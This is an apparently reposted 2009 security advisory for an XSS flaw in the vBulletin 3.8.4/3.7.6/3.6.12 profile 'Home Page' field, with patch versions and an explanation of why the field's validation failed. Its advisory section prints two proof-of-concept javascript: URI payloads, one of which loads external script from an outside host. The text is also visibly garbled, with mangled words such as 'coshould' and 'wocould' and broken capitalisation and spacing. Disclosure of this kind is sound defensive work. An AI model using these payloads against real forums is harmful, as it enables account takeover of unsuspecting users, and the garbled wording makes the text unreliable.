VBB 3.8.4 XSS

VBulletin-Cross Site Script Redirection

Versions Affected: 3.8.4/3.7.6/3.6.12
Patches Available: 3.8.4PL1/3.7.6PL1/3.6.12PL1

Info: An XSS flaw within the user profile page has recently been discovered.
This coshould allow an attacker to carry out an action as a user or obtain
Access to a users account. To resolve this issue, it has been necessary
Release a patch level version of the active versions of vBulletin.

The upgrade process is the same as previous patch level releases-simply
Download the patch from the Members Area, extract the files and upload
Your webserver, overwriting the existing files. There is no upgrade script
Required.

As with all security-based releases, we recommend that all customers
Upgrade as soon as possible in order to prevent any potential damage
Resulting from the flaw being exploited.

Credits: The original finder of the security hole. (Jelsoft ?)

Researched & Disclosed by: MaXe (InterN0T.net)

References:
Http://www.vbulletin.com/forum/showthread.php? T = 319572

The Advisory

Quote:
The "Home Page" field in the user profile was only checking the user input
For either "www" or the following regular expression written in normal text:
Any letter from A to Z and/or a number from 0-9 +: // will make the link valid.

The output in the Home Page field is encoded with most likely htmlspecialchars (),
However before the patch it did not check if a user wocould create a link that
Wocould send an unknowing user to either the data: or javascript URI scheme.

The only limits in the Home Page field are:
-90 character limit
-Characters will be converted to html entities.
-We can only use the data or javascript URI scheme.

This means that we shoshould avoid "since that becomes & quot;... The other
Characters like <will become & lt; which is % 3C which is almost the same.
Please see how htmlentities () and htmlspecialchars () works in PHP.

The following scheme input as home page will alert 0:
Javascript: // % 0adocument. write (<script> alert (0) </script>)

The following scheme is a Proof of Concept that external Javascript can be loaded:
Javascript: // % 0adocument. write (<script src = http://intern0t.net/.k> </script>)

The following URL contains a working Proof of Concept on the Contact Page:
Html "> http://forum.intern0t.net/members/maxe.html (will be removed soon)

Solution
Update to the newest version of vBulletin-3.8.4PL1/3.7.6PL1/3.6.12PL1

Conclusion
VBulletin is generally a safe and secure platform to use for large forums.
This security hole/exploit is implausible to actually work against people.
Please see: http://forum.intern0t.net/blogs/maxe...scripting.html for more information!

Disclosure Information:
-Unknown date of when the vendor found the security hole.
-Vendor released patch on the 7th October 2009.
-Security hole researched and disclosed on 8th October 2009.

All of the best,
MaXe
__________________